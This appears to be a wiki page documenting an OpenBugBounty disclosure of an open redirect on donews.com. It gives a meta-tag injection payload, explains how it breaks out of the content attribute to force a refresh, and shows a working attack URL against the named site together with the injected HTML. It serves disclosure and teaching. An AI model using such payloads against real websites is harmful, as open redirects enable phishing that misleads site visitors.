Open Redirect at donews.com

From Hackipedia
Jump to: navigation, search
OpenBugBounty #255232
Target: DoNews
Target Module:
Type: Open Redirect
Original Link
Payload 0;url=///example.org" http-equiv="refresh

Meta tags are a common injection point for web devs who try to buff page relevancy with user, etc.

It is possible to make a page do a redirect with meta tags by appending a ;url= to the content attribute. Then it is required to break out of the attribute and force the page to refresh with a http-equiv call.


With the advent of open graph meta tags this vuln will be around for a long time to come.


Attack URL:

http://www.donews.com/search/search_word?keyword=0;url=///openbugbounty.org" http-equiv="refresh

Result:

<meta name="keywords" content="0;url=///openbugbounty.org" http-equiv="refresh" />
<meta name="description" content="0;url=///openbugbounty.org" http-equiv="refresh" />